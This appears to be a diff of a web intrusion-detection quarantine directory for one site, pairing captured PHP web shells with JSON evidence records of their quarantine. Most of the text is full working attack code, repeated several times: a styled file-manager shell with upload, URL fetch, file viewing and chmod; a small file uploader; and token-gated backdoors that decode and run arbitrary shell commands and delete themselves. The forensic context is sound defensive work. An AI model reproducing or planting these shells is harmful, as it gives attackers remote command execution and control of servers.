background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5108",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/templates/isis/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783346970,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/templates/isis/index.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5103",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783346953,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/yhajxaav.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
1
var/www/hosting/archlinexp.eu/www/bexkn.php.json
Normal file
1
var/www/hosting/archlinexp.eu/www/bexkn.php.json
Normal file
@ -0,0 +1 @@
|
||||
<?php echo '<center><pre><br><br>'.php_uname()."\n".'<br><b><font color="red">{</font> Uploader by X-MrG3P5 <font color="red">}</font></b><br><br><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo '<b style="color: green;">Ok Uploaded';}else{echo '<b style="color: red;">Not uploaded!';}}?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4916",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:bexkn.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/bexkn.php.json)",
|
||||
"original_sha256": "a9422f224ffc70deb475a1ad4d399a4bfcb87a3a7051341bfd9a8326153416cb",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783740328,
|
||||
"size": 448,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "bexkn.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json
Normal file
10
var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='f0c1cfa275d47875';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4838",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json)",
|
||||
"original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783194675,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "c_03e0fd55.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json
Normal file
10
var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='e45f50da3800d36c';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4865",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json)",
|
||||
"original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783201883,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "c_7f0b46f9.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json
vendored
Normal file
10
var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json
vendored
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='f0c1cfa275d47875';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
15
var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json.evidence.json
vendored
Normal file
15
var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json.evidence.json
vendored
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5015",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:cache/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json)",
|
||||
"original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783194683,
|
||||
"size": 762,
|
